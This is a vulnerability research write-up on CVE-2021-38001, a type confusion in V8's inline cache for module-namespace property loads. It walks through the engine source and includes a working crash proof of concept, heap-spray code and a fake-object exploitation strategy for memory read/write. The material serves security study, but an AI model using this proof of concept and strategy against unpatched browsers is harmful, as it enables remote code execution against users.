Skip to content

Latest commit

 

History

History
380 lines (297 loc) · 14.9 KB

CVE-2021-38001.md

File metadata and controls

380 lines (297 loc) · 14.9 KB

CVE-2021-38001

This bug is reported by @s0rrymybad on TianfuCup 2021 Chrome category.

Introduction

Currently so many bugs are related with property access mechanism.

Actually this bug is quite similar to CVE-2021-30517, but before starting root cause analysis, we need to know how V8 internally handle property access related operations. I will shortly review them as following sequence =].

  • Property access bytecode handler
  • How to make Inline Cache for property access
  • Root cause analysis
  • Exploit strategy

Property access bytecode handler

Here is simple property access example.

let o = {x: 1, y: 2};
o.x;

In this case, LdaNamedProperty bytecode is generated like following snippet.

 0x1f908293476 @    0 : 7c 00 00 29       CreateObjectLiteral [0], [0], #41
 0x1f90829347a @    4 : 25 02             StaCurrentContextSlot [2]
 0x1f90829347c @    6 : 16 02             LdaCurrentContextSlot [2]
 0x1f90829347e @    8 : c3                Star1
 0x1f90829347f @    9 : 2d f9 01 01       LdaNamedProperty r1, [1], [1]
 0x1f908293483 @   13 : c4                Star0
 0x1f908293484 @   14 : a9                Return

This LdaNamedProperty handler is defined in interpreter-generator.cc.

IGNITION_HANDLER(LdaNamedProperty, InterpreterAssembler) {
  TNode<HeapObject> feedback_vector = LoadFeedbackVector();
  // Load receiver.
  TNode<Object> recv = LoadRegisterAtOperandIndex(0);  // [0]
  ...
  LazyNode<Name> lazy_name = [=] {
    return CAST(LoadConstantPoolEntryAtOperandIndex(1));  // [1]
  };
  ...
  AccessorAssembler::LazyLoadICParameters params(lazy_context, recv, lazy_name,
                                                 lazy_slot, feedback_vector);
  AccessorAssembler accessor_asm(state());
  accessor_asm.LoadIC_BytecodeHandler(&params, &exit_point);  // [2]
  ...
}

It loads receiver(recv) and property name(lazy_name), and receiver is o, lazy_name is x.

void AccessorAssembler::LoadIC_BytecodeHandler(const LazyLoadICParameters* p,
                                               ExitPoint* exit_point) {
  Label stub_call(this, Label::kDeferred), miss(this, Label::kDeferred),
      no_feedback(this, Label::kDeferred);

  GotoIf(IsUndefined(p->vector()), &no_feedback);

  TNode<Map> lookup_start_object_map =
      LoadReceiverMap(p->receiver_and_lookup_start_object());
  GotoIf(IsDeprecatedMap(lookup_start_object_map), &miss);

  // Inlined fast path.
  {
    Comment("LoadIC_BytecodeHandler_fast");

    TVARIABLE(MaybeObject, var_handler);
    Label try_polymorphic(this), if_handler(this, &var_handler);

    TNode<MaybeObject> feedback = TryMonomorphicCase(
        p->slot(), CAST(p->vector()), lookup_start_object_map, &if_handler,
        &var_handler, &try_polymorphic);

    BIND(&if_handler);
    HandleLoadICHandlerCase(p, CAST(var_handler.value()), &miss, exit_point);

    BIND(&try_polymorphic);
    {
      TNode<HeapObject> strong_feedback =
          GetHeapObjectIfStrong(feedback, &miss);
      GotoIfNot(IsWeakFixedArrayMap(LoadMap(strong_feedback)), &stub_call);
      HandlePolymorphicCase(lookup_start_object_map, CAST(strong_feedback),
                            &if_handler, &var_handler, &miss);
    }
  }

  BIND(&stub_call);
  {
    Comment("LoadIC_BytecodeHandler_noninlined");

    // Call into the stub that implements the non-inlined parts of LoadIC.
    Callable ic = Builtins::CallableFor(isolate(), Builtin::kLoadIC_Noninlined);
    TNode<Code> code_target = HeapConstant(ic.code());
    exit_point->ReturnCallStub(ic.descriptor(), code_target, p->context(),
                               p->receiver_and_lookup_start_object(), p->name(),
                               p->slot(), p->vector());
  }

  BIND(&no_feedback);
  {
    Comment("LoadIC_BytecodeHandler_nofeedback");
    // Call into the stub that implements the non-inlined parts of LoadIC.
    exit_point->ReturnCallStub(
        Builtins::CallableFor(isolate(), Builtin::kLoadIC_NoFeedback),
        p->context(), p->receiver(), p->name(),
        SmiConstant(FeedbackSlotKind::kLoadProperty));
  }

  BIND(&miss);
  {
    Comment("LoadIC_BytecodeHandler_miss");

    exit_point->ReturnCallRuntime(Runtime::kLoadIC_Miss, p->context(),
                                  p->receiver(), p->name(), p->slot(),
                                  p->vector());
  }
}

Simply said, there are 5 cases to handle property access.

  1. If there is no information in p->vector(), it will jump to no_feedback branch.
  2. If p->vector() exist, check whether lookup_start_object_map is deprected or not.
  3. If lookup_start_object_map is stable, it check whether this is monomorphic case or not.
  4. If it is not monomorphic case, it try to check whether this is polymorphic case or not.
  5. If it is polymorphic case, it will jump to stub_call branch, but if not, it will jump to miss branch.

How to make Inline Cache for property access

As i said before, there is no feedback vector information at first. So it will call AccessorAssembler::LoadIC_NoFeedback.

void AccessorAssembler::LoadIC_NoFeedback(const LoadICParameters* p,
                                          TNode<Smi> ic_kind) {
  Label miss(this, Label::kDeferred);
  TNode<Object> lookup_start_object = p->receiver_and_lookup_start_object();
  GotoIf(TaggedIsSmi(lookup_start_object), &miss);
  TNode<Map> lookup_start_object_map = LoadMap(CAST(lookup_start_object));
  GotoIf(IsDeprecatedMap(lookup_start_object_map), &miss);

  TNode<Uint16T> instance_type = LoadMapInstanceType(lookup_start_object_map);

  {
    // Special case for Function.prototype load, because it's very common
    // for ICs that are only executed once (MyFunc.prototype.foo = ...).
    Label not_function_prototype(this, Label::kDeferred);
    GotoIfNot(IsJSFunctionInstanceType(instance_type), &not_function_prototype);
    GotoIfNot(IsPrototypeString(p->name()), &not_function_prototype);

    GotoIfPrototypeRequiresRuntimeLookup(CAST(lookup_start_object),
                                         lookup_start_object_map,
                                         &not_function_prototype);
    Return(LoadJSFunctionPrototype(CAST(lookup_start_object), &miss));
    BIND(&not_function_prototype);
  }

  GenericPropertyLoad(CAST(lookup_start_object), lookup_start_object_map,
                      instance_type, p, &miss, kDontUseStubCache);

  BIND(&miss);
  {
    TailCallRuntime(Runtime::kLoadNoFeedbackIC_Miss, p->context(),
                    p->receiver(), p->name(), ic_kind);
  }
}

If lookup_start_object is not a SMI and is not deprecated, then it will generally call GenericPropertyLoad. It's behavior is simple.

  1. Check whether lookup_start_object's instance type is special or it is dictionary mode now.
  2. if property descritor exist, and if property exist on current descriptor, it will call LoadPropertyFromFastObject and jump to if_found_on_lookup_start_object.
  3. If not, it will jump to lookup_prototype_chain to find correct property in prototype chain.
  4. Above [2] and [3] case, they also call Runtime_LoadNoFeedbackIC_Miss to install/update feedback vector.

So after property access occur a few times, now feedback vector is installed, then inline cache system utilizes installed feedback vector.

Root cause analysis

The vulnerability patch commit is here.

As you can see, both accessor-assembler.cc and ic.cc are patched. When cache miss occur, ComputeHandler is called to update cache, then compiled accessor-assembler.cc's codes are affected.

There is type confusion between receiver in accessor-assembler.cc and lookup_start_object(holder) in ic.cc.

Because ic.cc will update cache based on lookup_start_object(holder) which should be in JSModuleNamespace, but after update, actual property access operation run on recevier object which is not in JSModuleNamespace. So if receiver and lookup_start_object(holder) are different, type confusion occur.

If you write correct poc, crash will occur in AccessorAssembler::HandleLoadICSmiHandlerLoadNamedCase.

At first, we need to access some property which is in JSModuleNamespace.

// 1.mjs
export let x = {};
export let y = {};
export let z = {};

// 2.mjs
// run "./d8 --allow-natives-syntax ./2.mjs"
import * as module from "1.mjs";
%DebugPrint(module)

/*
DebugPrint: 0x2a9a0810a849: [JSModuleNamespace]
 - map: 0x2a9a082c7cf9 <Map(DICTIONARY_ELEMENTS)> [DictionaryProperties]
 - prototype: 0x2a9a08002235 <null>
 - elements: 0x2a9a0810a8d9 <NumberDictionary[16]> [DICTIONARY_ELEMENTS]
 - module: 0x2a9a08293745 <Other heap object (SOURCE_TEXT_MODULE_TYPE)>
 - properties: 0x2a9a0810a85d <NameDictionary[29]>
 - All own properties (excluding elements): {
   0x2a9a08005be5 <Symbol: Symbol.toStringTag>: 0x2a9a08004d59 <String[6]: #Module> (data, dict_index: 1, attrs: [___])
   x: 0x2a9a08293825 <AccessorInfo> (accessor, dict_index: 2, attrs: [WE_])
   z: 0x2a9a08293865 <AccessorInfo> (accessor, dict_index: 4, attrs: [WE_])
   y: 0x2a9a08293845 <AccessorInfo> (accessor, dict_index: 3, attrs: [WE_])
 }
 - elements: 0x2a9a0810a8d9 <NumberDictionary[16]> {
   - requires_slow_elements
 }
0x2a9a082c7cf9: [Map]
 - type: JS_MODULE_NAMESPACE_TYPE
 ...
*/

JSModuleNamespace means module object in above snippet. Then, this module object should be holder in ComputeHandler. I can make this by setting this module object to other object's prototype chain. Following one is poc for this vulnerability.

import * as module from "1.mjs";

function poc() {
    class C {
        m() {
            return super.y;
        }
    }

    let zz = {aa: 1, bb: 2};
    // receiver vs holder type confusion
    function trigger() {
        // set lookup_start_object
        C.prototype.__proto__ = zz;
        // set holder
        C.prototype.__proto__.__proto__ = module;

        // "c" is receiver in ComputeHandler [ic.cc]
        // "module" is holder
        // "zz" is lookup_start_object
        let c = new C();

        c.x0 = 0x42424242 / 2;
        c.x1 = 0x42424242 / 2;
        c.x2 = 0x42424242 / 2;
        c.x3 = 0x42424242 / 2;
        c.x4 = 0x42424242 / 2;

        // LoadWithReceiverIC_Miss
        // => UpdateCaches (Monomorphic)
        // CheckObjectType with "receiver"
        let res = c.m();
    }
    
    for (let i = 0; i < 0x100; i++) {
        trigger();
    }
}

poc();

void AccessorAssembler::HandleLoadICSmiHandlerLoadNamedCase(
  
  ...
    
  BIND(&module_export);
  {
    Comment("module export");
    TNode<UintPtrT> index =
        DecodeWord<LoadHandler::ExportsIndexBits>(handler_word);
    TNode<Module> module =
        LoadObjectField<Module>(CAST(p->receiver()), JSModuleNamespace::kModuleOffset);  // [0]
    TNode<ObjectHashTable> exports =
        LoadObjectField<ObjectHashTable>(module, Module::kExportsOffset);
    TNode<Cell> cell = CAST(LoadFixedArrayElement(exports, index));
    // The handler is only installed for exports that exist.
    TNode<Object> value = LoadCellValue(cell);
    Label is_the_hole(this, Label::kDeferred);
    GotoIf(IsTheHole(value), &is_the_hole);
    exit_point->Return(value);

    ...
  
  }

Although [0] expects Module type object, the receiver(c in poc) is not Module object. So exports will be set by c's SMI property field value(0x42424242), type confusion and crash will occur.

Exploit strategy

At first, to make fake object, we need to figure out where our fake object is located. Although we don't have any memory leak primitive yet, due to compressed pointer in V8, we can easily solve this problem with heap spray.

Heap spray

Before pointer compression was introduced, how sophisticated we do heap spray, it is very hard to guess sprayed address because we have to guess whole address (generally 6 bytes).

But due to pointer compression, we don't need to know high 2 bytes !

            |----- 32 bits -----|----- 32 bits -----|
Pointer:    |________base_______|______offset_____w1|

Because base value is fixed when isolate is instantiated, so we just do guess low 4 bytes (offset).

And actually i didn't fully analyze why this happen, sprayed objects are usually located similar region on macOS and Linux. (on d8 and chrome).

            |----- 32 bits -----|----- 32 bits -----|
Pointer:    |________base_______|_____0x083xxxxx____|

Thus, it is quite easy to guess sprayed heap address :)

var victim_array = [];
victim_array.length = 0x1000;

var double_array = [1.1];
double_array.length = 0x10000;
double_array.fill(1.1);

function spray_heap() {
    for(var i = 0;i < victim_array.length;i++){
        victim_array[i] = double_array.slice(0,double_array.length);
    }
}

spray_heap();
%DebugPrint(double_array);

Exploit

After getting sprayed objects address, we need to build fake object. We usually build fake PACKED_DOUBLE_ELEMENTS array to READ/WRITE caged region (compressed pointer) by switching its ELEMENTS field.

There are 2 options to make PACKED_DOUBLE_ELEMENTS array.

  1. Basic Maps have static low 32 bits value, so we can use it without any memory leak. (But this value is different from version to version, device to device).
  2. Build fake Map and make fake object with that Map.

I used [1] method to make just reference exploit.
You can see my exploit in here
So if you want to stable exploit, i think you have to use second method :)